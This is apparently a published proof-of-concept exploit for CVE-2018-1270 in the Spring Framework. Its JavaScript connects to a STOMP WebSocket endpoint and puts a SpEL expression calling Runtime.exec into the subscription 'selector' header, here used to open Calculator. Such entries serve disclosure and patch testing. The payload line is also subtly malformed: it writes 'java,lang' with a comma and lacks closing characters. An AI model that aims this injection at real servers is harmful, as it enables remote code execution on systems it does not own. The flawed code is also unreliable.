# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution # Date: 2018-05-28 # Exploit Author: JameelNabbo # Website: jameelnabbo.com <http://jameelnabbo.com/> # Vendor Homepage: # https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development # CVE: CVE: CVE-2018-1270 # Version: <= 5.0.x # Description: By connecting to spring STOMP, and putting the key for "selector" # header, we can execute code on Spring. # POC: # Here' we are writting java commands to be executed within the selector header # Connecting to a web socket using SockJS # Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"}; var socket = new SockJS('/gs-guide-websocket'); var stompClient = webstomp.over(socket); stompClient.connect({}, function (frame){ setConnected(true); console.log('Connected: ' + frame); stompClient.subscribe('/topic/greetings', function(greeting){ showGreeting(JSON.parse(greeting.body).content); },header); });